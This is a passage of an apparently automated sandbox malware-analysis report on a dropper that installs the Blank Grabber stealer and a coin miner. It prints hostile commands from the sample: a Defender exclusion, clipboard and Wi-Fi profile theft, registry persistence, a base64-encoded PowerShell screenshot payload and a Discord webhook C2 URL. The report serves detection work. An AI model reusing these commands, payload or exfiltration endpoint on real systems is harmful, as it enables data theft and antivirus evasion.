A0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\HpQPPZazcv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HpQPPZazcv
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\HpQPPZazcv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7768, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7768, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", ProcessId: 7084, ProcessName: csc.exe
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6828, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7900, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6828, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 6972, ProcessName: cmd.exe
                                  Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6828, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6828, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                                  Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                  Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Recovery\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6828, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe, ParentProcessId: 7008, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 3808, ProcessName: svchost.exe
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 3808, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7080, ProcessName: wscript.exe
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', ProcessId: 6468, ProcessName: powershell.exe
                                  Source: Process startedAuthor: vburov: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe, ParentProcessId: 7008, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 3808, ProcessName: svchost.exe

                                  Data Obfuscation

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7768, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", ProcessId: 7084, ProcessName: csc.exe

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6828, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7932, ProcessName: cmd.exe
                                  No Snort rule has matched
                                  Timestamp:2024-08-01T04:27:06.688070+0200
                                  SID:2826930
                                  Source Port:49738
                                  Destination Port:443
                                  Protocol:TCP
                                  Classtype:Crypto Currency Mining Activity Detected
                                  Timestamp:2024-08-01T04:27:45.505027+0200
                                  SID:2048095
                                  Source Port:49739
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:2024-08-01T04:28:25.451584+0200
                                  SID:2048130
                                  Source Port:49753
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:2024-08-01T04:27:42.804877+0200
                                  SID:2036289
                                  Source Port:59750
                                  Destination Port:53
                                  Protocol:UDP
                                  Classtype:Crypto Currency Mining Activity Detected

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: C:\Program Files\Windows Defender\en-US\based.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Recovery\powershell.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\ProgramData\setup.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                  Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Recovery\HpQPPZazcv.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Users\user\AppData\Local\Temp\O7MNNZ56x3.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: TR/CoinMiner.lnxah
                                  Source: C:\ProgramData\svchost.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                  Source: based.exe.6828.4.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya"}
                                  Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 71%
                                  Source: C:\Program Files\Windows Defender\en-US\based.exeReversingLabs: Detection: 91%
                                  Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeReversingLabs: Detection: 91%
                                  Source: C:\ProgramData\Microsoft\based.exeReversingLabs: Detection: 55%
                                  Source: C:\ProgramData\Microsoft\hacn.exeReversingLabs: Detection: 70%
                                  Source: C:\ProgramData\setup.exeReversingLabs: Detection: 71%
                                  Source: C:\ProgramData\svchost.exeReversingLabs: Detection: 60%
                                  Source: C:\Recovery\HpQPPZazcv.exeReversingLabs: Detection: 91%
                                  Source: C:\Recovery\powershell.exeReversingLabs: Detection: 91%
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeReversingLabs: Detection: 21%
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeReversingLabs: Detection: 91%
                                  Source: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpReversingLabs: Detection: 91%
                                  Source: 8Ck8T5qRcC.exeReversingLabs: Detection: 52%
                                  Source: 8Ck8T5qRcC.exeVirustotal: Detection: 37%Perma Link
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                  Source: C:\Program Files\Windows Defender\en-US\based.exeJoe Sandbox ML: detected
                                  Source: C:\Recovery\powershell.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\setup.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exeJoe Sandbox ML: detected
                                  Source: C:\Recovery\HpQPPZazcv.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\svchost.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\Microsoft\hacn.exeJoe Sandbox ML: detected
                                  Source: 8Ck8T5qRcC.exeJoe Sandbox ML: detected

                                  Bitcoin Miner

                                  barindex
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: 8Ck8T5qRcC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Windows Defender\en-US\based.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Windows Defender\en-US\7c80744c9cd64c
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3e
                                  Source: 8Ck8T5qRcC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 8Ck8T5qRcC.exe, 00000000.00000000.1653907239.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp, 8Ck8T5qRcC.exe, 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp, s.exe, 00000007.00000000.1692832193.0000000000DB3000.00000002.00000001.01000000.00000011.sdmp, s.exe, 00000007.00000003.1702500179.0000000007643000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000007.00000002.1728643045.0000000000DB3000.00000002.00000001.01000000.00000011.sdmp, svchost.exe, 0000000E.00000002.1729961468.0000000000193000.00000002.00000001.01000000.0000001E.sdmp, svchost.exe, 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1720220248.0000000000193000.00000002.00000001.01000000.0000001E.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: based.exe, 00000004.00000002.2415416350.00007FFE126EB000.00000040.00000001.01000000.00000012.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: based.exe, 00000004.00000002.2418711029.00007FFE130C1000.00000040.00000001.01000000.00000017.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000004.00000002.2414595024.00007FFE11EB1000.00000040.00000001.01000000.00000014.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: based.exe
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: based.exe, based.exe, 00000004.00000002.2391546789.00007FFDFAC15000.00000040.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: based.exe, 00000004.00000002.2394342718.00007FFDFB31F000.00000040.00000001.01000000.0000000D.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: based.exe, 00000004.00000002.2415059724.00007FFE11ED1000.00000040.00000001.01000000.00000013.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: based.exe, 00000004.00000002.2392560474.00007FFDFAEAF000.00000040.00000001.01000000.00000019.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: based.exe, 00000004.00000002.2418451662.00007FFE12E11000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000004.00000002.2398061369.00007FFE10241000.00000040.00000001.01000000.00000018.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: based.exe, 00000004.00000002.2398598485.00007FFE10301000.00000040.00000001.01000000.0000001B.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: based.exe, 00000004.00000002.2415416350.00007FFE126EB000.00000040.00000001.01000000.00000012.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: based.exe, 00000004.00000002.2392560474.00007FFDFAEAF000.00000040.00000001.01000000.00000019.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000001.00000003.1666084515.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1667289838.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1763556973.00007FFE13311000.00000002.00000001.01000000.0000000C.sdmp, based.exe, 00000004.00000002.2419769711.00007FFE13241000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000004.00000002.2419464738.00007FFE13201000.00000040.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: based.exe, 00000004.00000002.2391546789.00007FFDFAC15000.00000040.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000003.00000002.1735603222.00007FFDFB78F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: based.exe, 00000004.00000002.2414008753.00007FFE11511000.00000040.00000001.01000000.00000016.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
